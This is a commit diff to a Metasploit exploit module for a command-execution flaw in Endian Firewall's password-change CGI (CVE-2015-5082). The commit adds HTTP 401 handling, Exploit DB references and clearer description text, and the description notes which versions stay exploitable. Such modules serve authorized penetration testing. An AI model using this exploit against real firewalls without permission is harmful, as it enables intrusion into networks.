Added handling for HTTP 401 (Authorization Required) response from target.

Added Exploit DB entries to references list.

Minor change to description text for clarity.

modules/exploits/linux/http/efw_chpasswd_exec.rb

@@ -31,8 +31,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
         Very early versions of Endian Firewall (e.g. 1.1 RC5) require
         HTTP basic auth credentials as well to exploit this vulnerability.
-        Use the standard USERNAME and PASSWORD advanced options to specify
+        Use the USERNAME and PASSWORD advanced options to specify these values
-        these values if required.
+        if required.
 
         Versions >= 3.0.0 still contain the vulnerable code, but it appears to
         never be executed due to a bug in the vulnerable CGI script which also
@@ -58,7 +58,8 @@ class Metasploit4 < Msf::Exploit::Remote
         ['CVE', '2015-5082'],
         ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
 #        ['OSVDB', ''],
-#        ['EDB', ''],
+        ['EDB', '37426'],
+        ['EDB', '37428'],
         ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
       ],
       'Privileged'  => false,
@@ -173,10 +174,18 @@ class Metasploit4 < Msf::Exploit::Remote
         'data' => data
       })
 
-     if res && res.code == 404
+     if res
-       fail_with(Failure::Unreachable,
+       if res.code == 401
-         "#{rhost}:#{rport} - Received a 404 HTTP response - " +
+         fail_with(Failure::NoAccess,
-         "your TARGETURI value is most likely not correct")
+           "#{rhost}:#{rport} - Received a 401 HTTP response - " +
+           "specify web admin credentials using the USERNAME " +
+           "and PASSWORD advanced options to target this host.")
+       end
+       if res.code == 404
+         fail_with(Failure::Unreachable,
+           "#{rhost}:#{rport} - Received a 404 HTTP response - " +
+           "your TARGETURI value is most likely not correct")
+       end
      end
 
   end